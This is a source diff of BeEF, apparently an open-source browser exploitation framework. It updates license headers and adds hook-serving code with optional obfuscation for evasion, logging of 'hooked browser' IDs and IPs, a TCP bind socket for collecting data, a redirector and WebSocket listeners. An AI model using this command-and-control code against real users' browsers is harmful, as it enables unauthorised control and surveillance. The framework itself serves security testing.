+            if hook_session_config['beef_host'].eql? "0.0.0.0"
+              hook_session_config['beef_host'] = req_host
+              hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
+            end
+
+            # @note set the XHR-polling timeout
+            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
+
+            # @note set the hook file path
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+
+            # @note if http_port <> public_port in config ini, use the public_port
+            unless hook_session_config['beef_public_port'].nil?
+              if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+                hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+                if hook_session_config['beef_public_port'] == '443'
+                  hook_session_config['beef_url'].sub!(/http:/, 'https:')
+                end
+              end
+            end
+
+            # @note Set some WebSocket properties
+            if config.get("beef.http.websocket.enable")
+              hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
+              hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
+              hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
+              hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
+            end
+
+            # @note populate place holders in the beef_js string and set the response body
+            eruby = Erubis::FastEruby.new(beef_js)
+            @hook = eruby.evaluate(hook_session_config)
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
+            else
+              @final_hook = ext_js_to_not_obfuscate + @hook
+            end
+
+            # @note Return the final hook to be sent to the browser
+            @body << @final_hook
+
+          end
+
+          # Finds the path to js components
+          # @param [String] component Name of component
+          # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
+          def find_beefjs_component_path(component)
+            component_path = component
+            component_path.gsub!(/beef./, '')
+            component_path.gsub!(/\./, '/')
+            component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
+
+            return false if not File.exists? component_path
+
+            component_path
+          end
+
+          # Builds missing beefjs components.
+          # @param [Array] beefjs_components An array of component names
+          def build_missing_beefjs_components(beefjs_components)
+            # @note verifies that @beef_js_cmps is not nil to avoid bugs
+            @beef_js_cmps = '' if @beef_js_cmps.nil?
+
+            if beefjs_components.is_a? String
+              beefjs_components_path = find_beefjs_component_path(beefjs_components)
+              raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
+              beefjs_components = {beefjs_components => beefjs_components_path}
+            end
+
+            beefjs_components.keys.each { |k|
+              next if @beef_js_cmps.include? beefjs_components[k]
+
+              # @note path to the component
+              component_path = beefjs_components[k]
+
+              # @note we output the component to the hooked browser
+              @body << File.read(component_path)+"\n\n"
+
+              # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
+              if @beef_js_cmps.eql? ''
+                @beef_js_cmps = component_path
+              else
+                @beef_js_cmps += ",#{component_path}"
+              end
+            }
           end
         end
       end
-
-      if config.get("beef.http.websocket.enable")
-        hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
-        hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
-        hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
-      end
-      
-      # @note populate place holders in the beefjs string and set the response body
-      eruby = Erubis::FastEruby.new(beefjs)
-      @hook = eruby.evaluate(hook_session_config)
-
-      if config.get("beef.extension.evasion.enable")
-        evasion = BeEF::Extension::Evasion::Evasion.instance
-        @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
-      end
-
-      @body << @hook
-
     end
-
-    # Finds the path to js components
-    # @param [String] component Name of component
-    # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
-    def find_beefjs_component_path(component)
-      component_path = component
-      component_path.gsub!(/beef./, '')
-      component_path.gsub!(/\./, '/')
-      component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
-
-      return false if not File.exists? component_path
-
-      component_path
-    end
-
-    # Builds missing beefjs components.
-    # @param [Array] beefjs_components An array of component names
-    def build_missing_beefjs_components(beefjs_components)
-      # @note verifies that @beef_js_cmps is not nil to avoid bugs
-      @beef_js_cmps = '' if @beef_js_cmps.nil?
-
-      if beefjs_components.is_a? String
-        beefjs_components_path = find_beefjs_component_path(beefjs_components)
-        raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
-        beefjs_components = {beefjs_components => beefjs_components_path}
-      end
-
-      beefjs_components.keys.each {|k|
-        next if @beef_js_cmps.include? beefjs_components[k]
-
-        # @note path to the component
-        component_path = beefjs_components[k]
-
-        # @note we output the component to the hooked browser
-        @body << File.read(component_path)+"\n\n"
-
-        # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
-        if @beef_js_cmps.eql? ''
-          @beef_js_cmps = component_path
-        else
-          @beef_js_cmps += ",#{component_path}"
-        end
-      }
-    end
-
   end
-
-end
-end
-end
 end

core/main/handlers/modules/command.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -61,19 +51,11 @@ module BeEF
             #todo antisnatchor: remove this gsub crap adding some hook packing.
             if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
               #content = command_module.output.gsub('//
-              #//   Copyright 2012 Wade Alcorn wade@bindshell.net
               #//
-              #//   Licensed under the Apache License, Version 2.0 (the "License");
-              #//   you may not use this file except in compliance with the License.
-              #//   You may obtain a copy of the License at
+              #//   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              #//   See the file 'doc/COPYING' for copying permission
               #//
-              #//       http://www.apache.org/licenses/LICENSE-2.0
-              #//
-              #//   Unless required by applicable law or agreed to in writing, software
-              #//   distributed under the License is distributed on an "AS IS" BASIS,
-              #//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-              #//   See the License for the specific language governing permissions and
-              #//   limitations under the License.
               #//', "")
               ws.send(@output, hooked_browser.session)
             else
@@ -82,7 +64,7 @@ module BeEF
             # @note prints the event to the console
             if BeEF::Settings.console?
               name = command_module.friendlyname || kclass
-              print_info "Hooked browser #{hooked_browser.ip} has been sent instructions from command module '#{name}'"
+              print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']"
             end
 
             # @note flag that the command has been sent to the hooked browser

core/main/logger.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -24,6 +14,10 @@ module Core
     # Constructor
     def initialize
       @logs = BeEF::Core::Models::Log
+      @config = BeEF::Core::Configuration.instance
+
+      # if notifications are enabled create a new instance
+      @notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false
     end
   
     # Registers a new event in the logs
@@ -35,13 +29,21 @@ module Core
       # type conversion to enforce standards
       hb = hb.to_i
 
+      # get time now
+      time_now = Time.now
+      
       # arguments type checking
       raise Exception::TypeError, '"from" needs to be a string' if not from.string?
       raise Exception::TypeError, '"event" needs to be a string' if not event.string?
       raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
       
       # logging the new event into the database
-      @logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save
+      @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
+
+      # if notifications are enabled send the info there too
+      if @notifications
+        @notifications.new(from, event, time_now, hb)
+      end
       
       # return
       true

core/main/migration.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/models/browserdetails.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -94,9 +84,10 @@ module Models
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
       return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+      return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -105,6 +96,33 @@ module Models
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end
   
+    #
+    # Returns the icon representing the hardware the
+    # zombie is running on (i.e. iPhone, BlackBerry)
+    #
+    def self.hw_icon(session_id)
+
+      ua_string = get(session_id, 'BrowserReportedName')
+
+      return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
+
+      return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR
+	return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR
+
+      BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
+
+    end
+
   end
 
 end

core/main/models/command.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -65,11 +55,11 @@ module Models
       command.save
 
       # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
+      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
 
       # @note prints the event into the console
       if BeEF::Settings.console?
-        print_info "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'"
+        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
       end
     end
 

core/main/models/commandmodule.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/hookedbrowser.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/log.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/optioncache.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/result.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/user.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/network_stack/api.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/network_stack/assethandler.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -29,10 +19,25 @@ module Handlers
     # Starts the AssetHandler instance
     def initialize
       @allocations = {}
+      @sockets = {}
       @http_server = BeEF::Core::Server.instance
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
 
+    # Binds a redirector to a mount point
+    # @param [String] target The target for the redirector
+    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
+    # @return [String] URL Path of the redirector
+    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
+    def bind_redirect(target, path=nil)
+      url = build_url(path,nil)
+      @allocations[url] = {'target' => target}
+      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
+      @http_server.remap
+      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
+      url
+    end
+
     # Binds a file to a mount point
     # @param [String] file File path to asset
     # @param [String] path URL path to mount the asset to (can be nil for random path)
@@ -59,6 +64,60 @@ module Handlers
         print_info "Url [" + url + "] unmounted"
     end
 
+    # use it like: bind_socket("irc","0.0.0.0",6667)
+    def bind_socket(name, host, port)
+      if @sockets[name] != nil
+        print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]."
+      else
+        t = Thread.new {
+          server = TCPServer.new(host,port)
+          loop do
+            Thread.start(server.accept) do |client|
+              data = ""
+              recv_length = 1024
+              threshold = 1024 * 512
+              while (tmp = client.recv(recv_length))
+                data += tmp
+                break if tmp.length < recv_length || tmp.length == recv_length
+                # 512 KB max of incoming data
+                break if data > threshold
+              end
+              if  data.size > threshold
+                print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved."
+              else
+                @sockets[name] = {'thread' => t, 'data' => data}
+                print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data."
+                print_debug "Bind Socket [#{name}] received:\n#{data}"
+              end
+              client.close
+            end
+          end
+        }
+        print_info "Bind socket [#{name}] listening on [#{host}:#{port}]."
+      end
+    end
+
+    def get_socket_data(name)
+      data = nil
+      if @sockets[name] != nil
+        data = @sockets[name]['data']
+      else
+        print_error "Bind Socket [#{name}] does not exists."
+      end
+      data
+    end
+
+    def unbind_socket(name)
+        t = @sockets[name]['thread']
+        if t.alive?
+          print_debug "Thread to be killed: #{t}"
+          Thread.kill(t)
+          print_info "Bind Socket [#{name}] killed."
+        else
+          print_info "Bind Socket [#{name}] ALREADY killed."
+        end
+    end
+
     # Builds a URL based on the path and extension, if neither are passed a random URL will be generated
     # @param [String] path URL Path defined by bind()
     # @param [String] extension Extension defined by bind()

core/main/network_stack/handlers/dynamicreconstruction.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core

core/main/network_stack/handlers/redirector.rb

@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
+        # @todo Add new options to specify what kind of redirect you want to achieve
+        class Redirector
+
+	        @target = "" 	
+
+	        def initialize(target)
+	        	@target = target
+	        end
+
+	        def call(env)
+	        	@response = Rack::Response.new(
+	        		body = ['302 found'],
+	        		status = 302,
+	        		header = {
+	        			'Content-Type' => 'text',
+	        			'Location' => @target
+	        		}
+	        	)
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/network_stack/websocket/websocket.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -27,17 +17,156 @@ module BeEF
         @@activeSocket= Hash.new
         @@lastalive= Hash.new
         @@config = BeEF::Core::Configuration.instance
+        #@@wsopt=nil
         MOUNTS = BeEF::Core::Server.instance.mounts
 
         def initialize
-          port = @@config.get("beef.http.websocket.port")
+
+
           secure = @@config.get("beef.http.websocket.secure")
+          @root_dir = File.expand_path('../../../../../', __FILE__)
+
+          if (secure)
+            ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
+                     :tls_options => {
+                         :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
+                         :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
+                     }
+            }
+            # @note Start a WSS server socket
+            start_websocket_server(ws_secure_options, true)
+          end
+
+          # @note Start a WS server socket
+          ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
+          start_websocket_server(ws_options,false)
+
+          #  #Thread for websocket-secure
+          #  Thread.new {
+          #    port = @@config.get("beef.http.websocket.secure_port")
+          #    sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+          #    EventMachine.run {
+          #
+          #      wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
+          #               :tls_options => {
+          #                   :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
+          #                   :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
+          #               }
+          #      }
+          #
+          #
+          #      EventMachine::WebSocket.start(wsopt) do |ws|
+          #        begin
+          #          print_debug "New WebSocket-secured channel open."
+          #          ws.onmessage { |msg|
+          #            msg_hash = JSON.parse("#{msg}")
+          #            #@note messageHash[result] is Base64 encoded
+          #            if (msg_hash["cookie"]!= nil)
+          #              print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
+          #              #insert new connection in activesocket
+          #              @@activeSocket["#{msg_hash["cookie"]}"] = ws
+          #              print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
+          #            elsif msg_hash["alive"] != nil
+          #              hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+          #              unless hooked_browser.nil?
+          #                hooked_browser.lastseen = Time.new.to_i
+          #                hooked_browser.count!
+          #                hooked_browser.save
+          #
+          #                #Check if new modules need to be sent
+          #                zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+          #                zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+          #
+          #                #@todo antisnatchor:
+          #                #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+          #                #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+          #                dhook = BeEF::Extension::Requester::API::Hook.new
+          #                dhook.requester_run(hooked_browser, '')
+          #
+          #                #Check if new XssRays scan need to be started
+          #                xssrays = BeEF::Extension::Xssrays::API::Scan.new
+          #                xssrays.start_scan(hooked_browser, '')
+          #              end
+          #            else
+          #              #json recv is a cmd response decode and send all to
+          #              #we have to call dynamicreconstructor handler camp must be websocket
